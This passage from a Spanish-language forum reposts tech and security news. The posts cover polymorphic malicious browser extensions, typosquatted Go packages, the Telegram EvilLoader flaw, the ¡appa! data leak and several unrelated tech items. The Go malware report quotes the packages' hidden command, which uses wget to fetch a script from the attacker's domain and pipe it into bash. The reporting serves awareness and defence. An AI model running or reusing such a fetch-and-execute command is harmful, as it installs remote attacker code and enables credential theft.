5.   Vigilar los movimientos bancarios: Ante cualquier cargo no reconocido, contactar de inmediato con la entidad financiera para bloquear posibles transacciones fraudulentas.

6.   Denunciar el fraude: Si se ha sido víctima de un engaño, es crucial denunciar ante la Policía Nacional o la Guardia Civil y contactar con la entidad financiera para minimizar daños.

OCU exige más transparencia y protección para los clientes

La OCU ha instado a El Corte Inglés a proporcionar información más detallada sobre la fecha exacta del ciberataque (aún no revelada) y a garantizar que los afectados sean informados de manera individual. Además, recuerda que cualquier pago realizado bajo engaño debe ser reembolsado por la entidad bancaria.

Para resolver dudas o reportar cualquier incidencia al respecto, El Corte Inglés ha habilitado el teléfono gratuito 900 334 334 y el correo electrónico No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

Fuente:
Genbeta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#22

Noticias Informáticas / ChatGPT en macOS ahora puede editar código directamente

Marzo 06, 2025, 04:15:01 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

ChatGPT, la plataforma de chatbot con tecnología de IA de OpenAI, ahora puede editar código directamente, si está en macOS, claro.

La versión más reciente de la aplicación ChatGPT para macOS puede realizar acciones para editar código en herramientas de desarrollador compatibles, incluidas Xcode, VS Code y JetBrains. Los usuarios pueden activar opcionalmente un modo de "aplicación automática" para que ChatGPT pueda realizar ediciones sin la necesidad de clics adicionales.

Los suscriptores de ChatGPT Plus, Pro y Team pueden usar la función de edición de código a partir del jueves actualizando su aplicación macOS. OpenAI dice que la edición de código se implementará para los usuarios de Enterprise, Edu y gratuitos la próxima semana.

En una publicación en X, Alexander Embiricos, un miembro del personal de productos de OpenAI que trabaja en software de escritorio, agregó que la aplicación ChatGPT para Windows tendrá edición de código directa "pronto".

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

La edición directa de código se basa en la capacidad de "trabajar con aplicaciones" de ChatGPT de OpenAI, que la empresa lanzó en versión beta en noviembre de 2024. "Trabajar con aplicaciones" permite que la aplicación ChatGPT para macOS lea código en un puñado de entornos de codificación centrados en el desarrollo, lo que minimiza la necesidad de copiar y pegar código en ChatGPT.

Con la capacidad de editar código directamente, ChatGPT ahora compite más directamente con herramientas de codificación de IA populares como Cursor y GitHub Copilot. Según se informa, OpenAI tiene la ambición de lanzar un producto dedicado a respaldar la ingeniería de software en los próximos meses.

Los asistentes de codificación de IA se están volviendo tremendamente populares, y la gran mayoría de los encuestados en la última encuesta de GitHub afirman que han adoptado herramientas de IA de alguna forma. Jared Friedman, socio de Y Combinator, afirmó recientemente que una cuarta parte del grupo de startups W25 de YC tiene el 95% de sus bases de código generadas por IA.

Pero existen una serie de riesgos de seguridad, derechos de autor y confiabilidad asociados con las herramientas de codificación asistida impulsadas por IA. Una encuesta del proveedor de software Harness reveló que la mayoría de los desarrolladores dedican más tiempo a depurar código generado por IA y vulnerabilidades de seguridad que a las contribuciones escritas por humanos. Mientras tanto, un informe de Google reveló que la IA puede acelerar las revisiones de código y la documentación de beneficios, pero a costa de la estabilidad de la entrega.

Fuente:
TechCruch
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#23

Noticias Informáticas / US. ofrece 10 millones de dólares de recompensa por hackers

Marzo 06, 2025, 03:56:42 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

En una importante operación coordinada, varias agencias de aplicación de la ley de Estados Unidos han acusado a 12 ciudadanos chinos de una serie de ataques cibernéticos que afectaron a organismos gubernamentales, grupos religiosos, organizaciones de medios de comunicación y gobiernos internacionales.

Entre los acusados se encuentran dos funcionarios del servicio de seguridad pública de China, empleados de una empresa tecnológica china y miembros de un supuesto grupo de piratas informáticos conocido como APT27, que también se denomina Iron Tiger, Emissary Panda, LuckyMouse, TG-3390 y Bronze Union.

Funcionarios del Departamento de Justicia, el FBI, el Servicio de Investigación Criminal Naval y los Departamentos de Estado y del Tesoro hicieron los anuncios, vinculando a estos actores cibernéticos con operaciones dirigidas por las agencias de seguridad del estado de China.

Según documentos judiciales, los piratas informáticos llevaron a cabo ataques desde aproximadamente 2016 hasta 2023, comprometiendo datos críticos a través de una serie de intrusiones informáticas. En muchos casos, los perpetradores ganaron sumas importantes vendiendo la información robada a agencias gubernamentales chinas.

En su comunicado de prensa, el Departamento de Justicia de Estados Unidos afirmó que una parte clave de la investigación involucra a una empresa privada, i-Soon Information Technology. Un tribunal federal de Manhattan hizo pública una acusación formal que acusa a ocho empleados de i-Soon y a dos agentes de seguridad pública de violar cuentas de correo electrónico, teléfonos móviles, servidores y sitios web.

El sistema de penetración de i-Soon y su software que evita la autenticación multifactor de Gmail
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

El tribunal también ha autorizado la confiscación del dominio principal de Internet vinculado a este grupo, que ha estado vinculado a actividades cibernéticas que incluyen ataques contra críticos radicados en Estados Unidos, una organización religiosa estadounidense y varios medios de comunicación.

Al mismo tiempo, se han presentado acusaciones separadas contra miembros del grupo de piratas informáticos APT27, que han estado activos desde al menos 2013. Estos cargos detallan esfuerzos para infiltrarse en redes en una variedad de sectores, desde empresas de tecnología y centros de estudios hasta bufetes de abogados y universidades.

Entre las acusaciones se encuentra un reciente ataque al Tesoro de Estados Unidos realizado a fines del año pasado, donde el uso de servidores privados virtuales alquilados jugó un papel clave. Los investigadores han confiscado la infraestructura digital vinculada a estas operaciones para desmantelar la red. Estos son los nombres y cargos de los acusados:

Ma Li (马丽), personal técnico

Wang Zhe (王哲), director de ventas

Sheng Jing (盛晶), oficial de MPS

Xu Liang (徐梁), personal técnico

Wang Liyu (王立宇), oficial de MPS

Wang Yan (王堰), personal técnico

Zhou Weiwei (周伟伟), personal técnico

Liang Guodong (梁国栋), personal técnico

Wu Haibo (吴海波), director ejecutivo

Chen Cheng (陈诚), director de operaciones

Las autoridades encargadas de hacer cumplir la ley también han hecho hincapié en que los atacantes no eran sólo agentes patrocinados por el Estado, sino que también trabajaban como autónomos y a través de empresas privadas. Su amplia gama de objetivos ha dejado muchos sistemas expuestos a nuevos incidentes cibernéticos, lo que ha causado importantes daños financieros y de reputación a las organizaciones afectadas.

En respuesta a estas acciones, las autoridades estadounidenses han ofrecido atractivas recompensas por información que conduzca a la identificación o ubicación de algunos de estos actores cibernéticos. Una oferta de recompensa es de hasta 10 millones de dólares por detalles sobre ciertas personas vinculadas a la red de piratería, mientras que otro programa ofrece hasta 2 millones de dólares por información sobre otras personas que operan desde China.

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#24

Noticias Informáticas / Extensiones polimórficas: Infostealers en extensión del navegador

Marzo 06, 2025, 03:51:15 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Con las recientes revelaciones de ataques como el Browser Syncjacking y los ladrones de información de extensiones, las extensiones de navegador se han convertido en una preocupación de seguridad principal en muchas organizaciones.

El equipo de investigación de SquareX descubre una nueva clase de extensiones maliciosas que pueden hacerse pasar por cualquier extensión instalada en el navegador de la víctima, incluidos los administradores de contraseñas y las billeteras de criptomonedas.

Estas extensiones maliciosas pueden transformarse para tener exactamente la misma interfaz de usuario, los mismos íconos y el mismo texto que la extensión legítima, lo que las convierte en un caso extremadamente convincente para que las víctimas ingresen sus credenciales y otra información confidencial.

Este ataque afecta a la mayoría de los navegadores principales, incluidos Chrome y Edge.

Las extensiones polimórficas funcionan explotando el hecho de que la mayoría de los usuarios interactúan con las extensiones a través de la barra de herramientas del navegador. El ataque comienza cuando el usuario instala la extensión maliciosa, que se disfraza, por ejemplo, como una herramienta de inteligencia artificial discreta. Para que el ataque sea aún más convincente, la extensión realiza la funcionalidad de inteligencia artificial como se anuncia y permanece benigna durante un período de tiempo predeterminado.

Sin embargo, mientras todo esto sucede, la extensión maliciosa comienza a averiguar qué otras extensiones están instaladas en el navegador de la víctima. Una vez identificada, la extensión polimórfica cambia por completo su propia apariencia para parecerse a la del objetivo, incluido el icono que se muestra en la barra de herramientas fijada. Incluso puede desactivar temporalmente la extensión de destino, eliminándola de la barra fijada. Dado que la mayoría de los usuarios utilizan estos iconos como una confirmación visual para informar con qué extensión están interactuando, es probable que cambiar el icono en sí sea suficiente para convencer al usuario medio de que está haciendo clic en la extensión legítima. Incluso si la víctima navega hasta el panel de control de la extensión, no hay una forma obvia de correlacionar las herramientas que se muestran allí con los iconos fijados. Para evitar sospechas, la extensión maliciosa puede incluso desactivar temporalmente la extensión de destino de modo que sean los únicos que tengan el icono del objetivo en la pestaña fijada.

Fundamentalmente, la extensión polimórfica puede hacerse pasar por cualquier extensión del navegador. Por ejemplo, puede imitar a los administradores de contraseñas populares para engañar a las víctimas para que introduzcan su contraseña maestra.

El atacante puede usar esta contraseña para iniciar sesión en el administrador de contraseñas real y acceder a todas las credenciales almacenadas en la bóveda de contraseñas. De manera similar, la extensión polimórfica también puede imitar las billeteras de criptomonedas populares, lo que les permite usar las credenciales robadas para autorizar transacciones para enviar criptomonedas al atacante. Otros objetivos potenciales incluyen herramientas para desarrolladores y extensiones bancarias que pueden proporcionar al atacante acceso no autorizado a aplicaciones donde se almacenan datos confidenciales o activos financieros.

Además, el ataque solo requiere permisos de riesgo medio según la clasificación de Chrome Store. Irónicamente, muchos de estos permisos son utilizados por los propios administradores de contraseñas, así como por otras herramientas populares como bloqueadores de anuncios y estilizadores de páginas, lo que hace que sea especialmente difícil para Chrome Store y los equipos de seguridad identificar intenciones maliciosas con solo mirar el código de la extensión.

El fundador de SquareX, Vivek Ramachandran, advierte que "las extensiones del navegador presentan un riesgo importante para las empresas y los usuarios actuales. Desafortunadamente, la mayoría de las organizaciones no tienen forma de auditar su huella de extensiones actual y verificar si son maliciosas. Esto subraya aún más la necesidad de una solución de seguridad nativa del navegador como Browser Detection and Response, similar a lo que un EDR es para el sistema operativo".

Estas extensiones polimórficas explotan las características existentes dentro de Chrome para llevar a cabo el ataque. Como tal, no hay ningún error de software involucrado y no se puede parchear.

SquareX ha escrito a Chrome para una divulgación responsable, recomendando la prohibición o la implementación de alertas de usuario para cualquier cambio de ícono de extensión o cambios abruptos en HTML, ya que los atacantes pueden aprovechar fácilmente estas técnicas para suplantar otras extensiones en un ataque polimórfico. Para las empresas, el análisis estático de extensiones y las políticas basadas en permisos ya no son suficientes: es fundamental tener una herramienta de seguridad nativa del navegador que pueda analizar dinámicamente el comportamiento de las extensiones en tiempo de ejecución, incluidas las tendencias polimórficas de las extensiones maliciosas.

Para obtener más información sobre las extensiones polimórficas, los hallazgos adicionales de esta investigación están disponibles en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

Acerca de SquareX

SquareX ayuda a las organizaciones a detectar, mitigar y buscar amenazas de ataques web del lado del cliente que ocurren contra sus usuarios en tiempo real, incluida la defensa contra extensiones maliciosas. Además del ataque polimórfico, SquareX también fue el primero en descubrir y revelar múltiples ataques basados en extensiones, incluido el Browser Syncjacking, el ataque de phishing de consentimiento de Chrome Store que condujo a la violación de Cyberhaven y muchas otras extensiones maliciosas compatibles con MV3 reveladas en DEF CON 32.

La solución de detección y respuesta del navegador (BDR) de SquareX, la primera en la industria, adopta un enfoque centrado en los ataques para la seguridad del navegador, lo que garantiza que los usuarios empresariales estén protegidos contra amenazas avanzadas como códigos QR maliciosos, phishing de navegador en el navegador, malware basado en macros y otros ataques web que abarcan archivos maliciosos, sitios web, scripts y redes comprometidas.

Además, con SquareX, las empresas pueden proporcionar a los contratistas y trabajadores remotos acceso seguro a aplicaciones internas, SaaS empresarial y convertir los navegadores en dispositivos BYOD/no administrados en sesiones de navegación confiables.

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#25

Noticias Informáticas / Malware infecta Linux y macOS a través de paquetes Go typosquatted

Marzo 06, 2025, 03:48:00 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Socket expone una campaña de typosquatting que distribuye malware a sistemas Linux y macOS a través de paquetes Go maliciosos. Descubra las tácticas utilizadas, incluida la ofuscación y el typosquatting de dominios, y aprenda a mantenerse a salvo.

Los investigadores de ciberseguridad del proveedor de soluciones de seguridad para la cadena de suministro de software, Socket, han descubierto una nueva tendencia preocupante en la que los actores maliciosos se dirigen cada vez más a los desarrolladores dentro de la red del lenguaje de programación Go.

Al emplear una técnica conocida como typosquatting, estos atacantes distribuyen malware disfrazado de paquetes Go legítimos, que están diseñados para instalar cargadores de malware ocultos en sistemas Linux y macOS.

La investigación de Socket, compartida con No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, muestra que los atacantes han publicado al menos siete de estos paquetes engañosos en Go Module Mirror, un repositorio central para módulos Go.

La lista completa incluye:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Estos paquetes se hacen pasar por bibliotecas populares, como "hypert" para probar clientes de API HTTP y "layout" para el desarrollo de la interfaz de usuario.

Detalles contextuales del paquete de diseño

El paquete "hiperactivo" parece estar dirigido específicamente a los desarrolladores del sector financiero.

Detalles contextuales del paquete Hypert malicioso

Este paquete malicioso contiene funciones ocultas (como qcJjJne()) que permiten la ejecución remota de código. Al ser importado a un proyecto, el código malicioso descarga y ejecuta silenciosamente un script desde un servidor remoto (alturastreeticu), que, a su vez, instala un archivo ejecutable que puede robar datos o credenciales confidenciales.

Para evadir la detección, los atacantes emplean varias técnicas. Por ejemplo, utilizan la ofuscación de cadenas basada en matrices para ocultar los comandos maliciosos dentro del código, lo que dificulta que las herramientas de seguridad tradicionales identifiquen la amenaza. Por ejemplo, el comando

wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash & se divide en cadenas de un solo carácter y se reconstruye utilizando una indexación no secuencial.

Además, el script malicioso incorpora un retraso de tiempo, esperando una hora antes de obtener la carga útil final, lo que les ayuda a eludir las medidas de seguridad que se centran en acciones inmediatas.

Los dominios maliciosos utilizados en esta campaña suelen parecerse a sitios web legítimos, en particular los relacionados con instituciones financieras. Esta táctica, conocida como domain typosquatting, tiene como objetivo engañar a los usuarios explotando su confianza en nombres y marcas familiares.

Los atacantes también están reutilizando cargas útiles y nombres de archivos similares en diferentes dominios y direcciones IP, lo que sugiere un esfuerzo coordinado y persistente.

El archivo ELF f0eee999, por ejemplo, muestra un comportamiento malicioso mínimo inicial, como leer /sys/kernel/mm/transparent_hugepage/, alineándose con un criptominero o cargador que permanece inactivo hasta que se cumplen las condiciones. Este archivo, junto con el script a31546bf, se ha observado en la investigación de Mads Hougesen, "Rogue One: A Malware Story", lo que indica posibles conexiones y tendencias más amplias, señalaron los investigadores.

La investigación de Socket destaca los crecientes riesgos asociados con los ataques a la cadena de suministro de software, donde los actores maliciosos apuntan a los desarrolladores y comprometen la integridad de las bibliotecas y paquetes ampliamente utilizados.

Se recomienda a los desarrolladores que estén atentos al incorporar paquetes externos a sus proyectos. Las herramientas de escaneo en tiempo real y las extensiones del navegador, junto con las auditorías de código y las prácticas cuidadosas de gestión de dependencias, son cruciales. Los desarrolladores también deben verificar la integridad de los paquetes, monitorear los nuevos repositorios y compartir indicadores de compromiso dentro de la comunidad.

Thomas Richards, consultor principal, director de práctica de redes y equipos rojos en Black Duck, un proveedor de soluciones de seguridad de aplicaciones con sede en Burlington, Massachusetts, comentó sobre el último desarrollo diciendo:

"Este ataque de typosquatting no es un nuevo vector de ataque, sin embargo, aún subraya lo importante que es administrar el riesgo del software y verificar que los módulos sean legítimos antes de integrarlos en el código fuente. La verificación de los paquetes generalmente se realiza firmándolos antes de agregarlos a un repositorio central. Cualquier aplicación que se desarrolle en Go debe revisarse de inmediato para asegurarse de que los paquetes maliciosos no estén presentes y los sistemas no se hayan visto comprometidos".

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#26

Noticias Informáticas / Fallo en Telegram para Android permite disfrazar malware como vídeos

Marzo 06, 2025, 03:02:03 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Los atacantes de Telegram están disfrazando scripts maliciosos como videos y engañando a los usuarios para que los ejecuten. Hacer clic accidentalmente filtrará algunos datos del usuario y puede provocar instalaciones forzadas de aplicaciones maliciosas.

Un investigador de seguridad que se hace llamar 0x6rss ha detallado una vulnerabilidad llamada EvilLoader que afecta a la aplicación de Android de Telegram. Es similar al error del año pasado cuando los atacantes enviaron directamente a los usuarios archivos APK disfrazados de videos para adultos.

Si bien Telegram corrigió la falla anterior, el investigador descubrió que su API aún permite a los atacantes disfrazar archivos maliciosos como videos.

Los atacantes pueden disfrazar un archivo .htm como un video y enviarlo a usuarios desprevenidos. Esta extensión se usa para archivos de páginas web guardados con el lenguaje de marcado de hipertexto (HTML). Sin embargo, las páginas web también pueden incluir y ejecutar código JavaScript (JS).

Si un usuario de Telegram intenta reproducir el archivo disfrazado, se ejecutará el código JavaScript dentro del HTML. Esto permite a los atacantes descargar y ejecutar cargas útiles maliciosas adicionales.

0x6rss describió un escenario teórico en el que un video falso no puede abrirse con un reproductor de video y luego redirige al usuario al navegador predeterminado, lo que permite que se ejecute el código JS malicioso.

Esto ya conduce a la dirección IP del usuario, pero el ataque no está completo. El archivo puede entonces imitar cualquier sitio web legítimo o redirigir a otros sitios web maliciosos. En el ejemplo proporcionado, el investigador falsificó la tienda Google Play, ofreciendo al usuario instalar una aplicación falsa de Google Play Protect.

Los usuarios recibirían algunas señales de alerta en forma de ventanas emergentes: tendrían que habilitar la instalación de aplicaciones de terceros y otorgarles permisos para tener control total sobre su dispositivo. Google protege a los usuarios de Android con Play Protect y advierte a los usuarios o bloquea las aplicaciones maliciosas conocidas que provienen de fuera de Play Store.

"La razón principal de la vulnerabilidad es que el formato de archivo '.htm' en la respuesta a los servidores de Telegram se percibe como un video", dijo el investigador en una publicación de blog.

"Se abre el contenido, lo que permite que se active y abra la página HTML especificada".

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Básicamente, la falla se encuentra en la forma en que la aplicación de Telegram para Android interpreta y procesa los archivos recibidos a través de la API. La aplicación intenta manejar el archivo .htm como un video y permite que se ejecute el código JS.

La prueba de concepto (PoC) de la falla ya está disponible públicamente:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#27

Noticias Informáticas / US quiere investigar a inmigrantes basándose en sus publicaciones en Facebook

Marzo 06, 2025, 02:59:51 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Estados Unidos está utilizando las redes sociales para investigar a los inmigrantes, y las publicaciones "problemáticas" pueden llevar a la denegación o la deportación. ¿Está en riesgo la libertad de expresión?

En 2025, el Servicio de Ciudadanía e Inmigración de Estados Unidos (USCIS) comenzará a utilizar las redes sociales para investigar a los inmigrantes.

La directiva del presidente Trump del 20 de enero tiene como objetivo reforzar la seguridad nacional, y el contenido en línea "problemático" puede llevar a la denegación o la deportación. Pero, ¿qué se considera "problemático" y cómo afectará a la libertad de expresión?

El USCIS está ampliando su proceso de investigación para incluir las publicaciones de los inmigrantes en las redes sociales, informó Newsweek. Se podría exigir a los solicitantes que revelen todos los canales de redes sociales, de forma similar a la lista de activos en un formulario de seguro. La pregunta es: ¿qué se califica como "contenido problemático"?

¿Algo tan simple como publicar letras anarquistas de una banda mexicana podría resultar en la denegación? ¿Cómo se interpretarán las opiniones políticas o las publicaciones irónicas?

Líneas rojas difusas

Esta no es la primera vez que se utilizan las redes sociales para filtrar a los inmigrantes. En 2017, la administración de Trump implementó el proceso de "investigación extrema", en el que se examinaban minuciosamente los canales de redes sociales de los solicitantes, junto con su controvertida prohibición de viajes dirigida a países predominantemente musulmanes.

Sin embargo, en 2025, esta política se extenderá a quienes ya están en Estados Unidos con tarjetas verdes, lo que genera inquietudes sobre el efecto paralizante sobre la libertad de expresión, en particular para quienes expresan sentimientos políticos en línea.

Ampliar la red

Un caso de 2019 pone de relieve las consecuencias de esta política. A Ismail Ajjawi, un estudiante palestino, se le negó la entrada a Estados Unidos porque algunos de sus amigos habían publicado contenido antiestadounidense.

A pesar de que Ajjawi no publicó nada, las opiniones de sus amigos fueron suficientes para etiquetarlo de "cuestionable". Esto ejemplifica cómo la política podría afectar a las personas por asociación.

La legislación de 2025 plantea inquietudes sobre la autocensura. Si los inmigrantes y los titulares de tarjetas verdes temen que sus publicaciones en línea conduzcan a la deportación, las redes sociales podrían convertirse en una plataforma de silencio.

Si otros países siguen el ejemplo, podría indicar el surgimiento de políticas de inmigración más restrictivas y autoritarias, que conduzcan a una vigilancia excesiva y al castigo de la disidencia.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#28

Noticias Informáticas / ¡Appa!: fuga de la app pone en riesgo a millones de argentinos

Marzo 05, 2025, 11:49:13 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Más de un millón de compradores en Argentina quedaron expuestos y vulnerables al fraude cuando la aplicación ¡appa! filtró su información de compra privada.

[Su sentimiento y rostro en este mismo instante >>> si es argentino:]

Una de las aplicaciones de compras más populares de Argentina, con un millón de descargas en Google Play Store, sufrió un error de ciberseguridad que filtró los datos privados de más de un millón de clientes.

Fundada en 2018, la aplicación ¡appa! evolucionó hasta convertirse en una plataforma de software como servicio (SaaS) para centros comerciales. Disponible en más de una docena de supermercados, ¡appa! ofrece diferentes servicios para los visitantes de los centros comerciales, desde pagar el estacionamiento hasta acceder a descuentos, programas de recompensas y beneficios.

El equipo de investigación de Cybernews descubrió un bucket de Amazon AWS S3 mal configurado que almacenaba más de mil archivos CSV con datos confidenciales vinculados con la empresa argentina a principios de noviembre del año pasado. Es preocupante que, a pesar de los múltiples intentos de comunicarse con la empresa, la instancia permanezca abierta al público.

¿Qué datos de ¡apps! se filtraron?:

Nombres completos

Fechas de nacimiento

Números de identificación nacional – Documento Nacional de Identidad (DNI)

Direcciones de correo electrónico

Números de teléfono

Información de compra, incluyendo hora y fecha de transacción, método de pago, monto gastado, número de tarjeta de fidelidad, tienda y centro comercial donde se realizaron las transacciones

El alcance de la filtración es muy preocupante, ya que afecta aproximadamente al 2,4% de la población argentina. La falta de una acción rápida socava la confianza y pone en tela de juicio la eficacia de las medidas de seguridad establecidas para proteger los datos de los usuarios y la postura general de seguridad de la empresa. De acuerdo con las normas nacionales de seguridad de datos, la empresa podría ser objeto de multas.

¡appa! Los usuarios corren el riesgo de ser víctimas de fraude

Aunque no hay indicios de que actores maliciosos hayan accedido a los archivos expuestos, los atacantes escanean continuamente la web en busca de servidores desprotegidos. Si nuestros investigadores hubieran podido encontrar los datos filtrados, los cibercriminales podrían haber hecho lo mismo.

El contenedor expuesto es una mina de oro para los ataques de phishing: cuanto más sepan los cibercriminales sobre usted, más probabilidades hay de que caiga en sus mentiras.

Imagine recibir un correo electrónico o un mensaje SMS con su nombre, correo electrónico y todos los detalles de su compra reciente, y pedirle que haga clic en el enlace para proporcionar información adicional.

También puede recibir una alerta sobre una nueva oferta especial en su programa de fidelización: para reclamarla, solo tiene que hacer clic en el enlace proporcionado. Es mucho más probable que las víctimas caigan en las trampas de los impostores, creyendo que se trata de una comunicación legítima relacionada con una compra.

Los enlaces de phishing podrían incitar a las víctimas a revelar los detalles de su cuenta financiera o enviar malware que podría vaciar las aplicaciones bancarias de las víctimas.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#29

Noticias Informáticas / ¿Podría Eutelsat de Europa ayudar a reemplazar a Starlink en Ucrania?

Marzo 05, 2025, 11:46:31 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Las sugerencias de que Ucrania podría perder el acceso al sistema de internet satelital Starlink de Elon Musk, que ha sido vital para mantener sus comunicaciones militares mientras lucha contra la invasión rusa, han centrado el interés de los inversores en el rival europeo más pequeño de Starlink, Eutelsat.

Los negociadores estadounidenses dijeron a Reuters el mes pasado que podrían usar el acceso a Starlink como una palanca en las conversaciones con Kiev sobre sus minerales críticos, y la compañía franco-británica ha dicho que está hablando con la UE sobre la posibilidad de proporcionar servicios adicionales a Ucrania.

El precio de las acciones de Eutelsat se ha más que cuadriplicado desde una disputa pública el 28 de febrero entre el presidente ucraniano Volodymyr Zelenskiy y el presidente estadounidense Donald Trump, después de la cual Washington suspendió la ayuda militar a Ucrania.

A continuación, se presenta un resumen de cómo Eutelsat podría ayudar a Ucrania a satisfacer sus necesidades de comunicación:

¿Qué importancia tiene Starlink para Ucrania?

Los usuarios de Starlink acceden a Internet para comunicarse con datos o voz mediante una pequeña antena parabólica que hace rebotar señales en una constelación de satélites.

Las redes fijas y móviles de Ucrania han resultado gravemente dañadas por los bombardeos desde que Rusia invadió el país en febrero de 2022, y Starlink ha ayudado a Kiev a llenar el vacío enviando decenas de miles de sus antenas con terminales.

Algunas están disponibles para los civiles, que a menudo intentan comunicarse con sus familiares a través de teléfonos inteligentes.

Pero la mayoría son utilizadas por las fuerzas armadas de Ucrania, que también tienen que lidiar con una gran interferencia de señales e interceptación de comunicaciones en las líneas del frente. Las unidades ucranianas a menudo se comunican entre sí a través de Starlink, y sus servicios se han vuelto prácticamente indispensables para el mando y control del campo de batalla.

Ucrania también utilizó Starlink para guiar drones de ataque hasta que la empresa de cohetes de Musk, SpaceX, frenó la práctica hace dos años.

Originalmente, SpaceX ayudó a financiar la provisión de Starlink a Ucrania. El gobierno de Estados Unidos tomó entonces el control, aunque el mes pasado Polonia dijo que había estado pagando la suscripción a Starlink de Ucrania y que continuaría haciéndolo.

¿Cómo se compara Eutelsat con Starlink?

Eutelsat ya respalda las comunicaciones gubernamentales e institucionales en Ucrania, y dijo a Reuters que puede proporcionar una alternativa para ciertas aplicaciones gubernamentales y de defensa.

Desde su fusión en 2023 con OneWeb de Gran Bretaña, Eutelsat controla la única constelación operativa de cobertura global, además de Starlink, de satélites en órbita terrestre baja (LEO).

Los más de 7.000 satélites LEO de Starlink, adecuados para la comunicación en tiempo real, le permiten llegar a más usuarios en todo el mundo y ofrecer velocidades de datos más altas.

Pero Eutelsat dice que, incluso con solo 630 satélites LEO, respaldados por 35 satélites vinculados en una órbita geoestacionaria más alta, ofrece las mismas capacidades que Starlink en Europa.

Starlink promete banda ancha de hasta 200 megabits por segundo, Eutelsat 150.

Sin embargo, los terminales OneWeb cuestan hasta 10.000 dólares, más un precio de suscripción mensual. Starlink cobra a los usuarios ucranianos un pago único de 589 dólares además de una suscripción mensual de 95 a 440 dólares, según el uso.

No se sabe si algún donante se ofrecería a financiar más suscripciones a OneWeb en Ucrania. Francia y Gran Bretaña, que están encabezando un acuerdo de paz para presentarlo a los EE.UU., tienen una participación combinada del 24,8% en Eutelsat Group.

¿Existen otras alternativas?

La competencia global para Starlink está tomando forma, pero lentamente.

SES, con sede en Luxemburgo, ofrece algunos servicios satelitales a la alianza de defensa occidental de la OTAN a través de su constelación de satélites O3b mPOWER en órbita terrestre media.

Pero, como muchos otros operadores de satélites tradicionales, prioriza a los clientes corporativos, los gobiernos y los militares, y no ofrece servicios directos al consumidor, con terminales que no son fáciles de usar para el consumidor.

Algunas iniciativas de la UE, como IRIS² (que se pronuncia "Iris al cuadrado") y GOVSATCOM (en la que Kiev está interesada), tardarán años en estar completamente operativas.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#30

Noticias Informáticas / Samsung finalmente pone fecha al lanzamiento estable de One UI 7

Marzo 05, 2025, 11:44:19 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Mientras Samsung nos bombardea con versiones beta aparentemente interminables, todos esperamos pacientemente el lanzamiento oficial de One UI 7. Sin embargo, el final ya está a la vista. La compañía finalmente ha puesto una fecha para su último lanzamiento de software e incluyó más detalles sobre las próximas actualizaciones beta.

Samsung ha confirmado que "la actualización oficial de One UI 7 estará disponible a partir de abril". No se ha facilitado la fecha exacta, pero por fin podemos marcar con un rotulador rojo el cuarto mes del año.

One UI 7 cambia el enfoque de Samsung hacia Android, incluyendo un marcado rediseño estético, actualizaciones del Quick Panel y la experiencia del launcher, y varias nuevas funciones de IA. El software está disponible en la serie Galaxy S25 desde enero. Sin embargo, el último anuncio de Samsung afectará a aquellos con dispositivos compatibles más antiguos.

Antes del lanzamiento estable de One UI 7, Samsung está agregando varios dispositivos nuevos a su programa beta. Más específicamente, los propietarios de Galaxy Z Fold 6 y Galaxy Z Flip 6 en los Estados Unidos, Corea, India y el Reino Unido pueden esperar la disponibilidad de la versión beta a partir de esta semana. Aquellos que utilicen las tabletas de la serie Galaxy S23 o Galaxy Tab S10 deberán esperar hasta finales de este mes. Estos dispositivos se unirán a la serie Galaxy S24, que ya ha visto una oleada de versiones beta desde diciembre.

Como es habitual, si se encuentra en una región compatible y utiliza uno de los dispositivos mencionados, puede registrarse en el programa beta de One UI 7 a través de la aplicación Samsung Members.

Fuente:
AndroidAuthority
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#31

Noticias Informáticas / GTA V finalmente recibe su actualización de "próxima generación" en PC

Marzo 05, 2025, 01:44:18 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Los jugadores de PC de Grand Theft Auto V por fin han alcanzado la paridad con sus hermanos de consola. Tras un anuncio el mes pasado, hoy Rockstar Games ha lanzado una actualización para PC con funciones que durante varios años solo habían estado disponibles para la última generación de consolas.

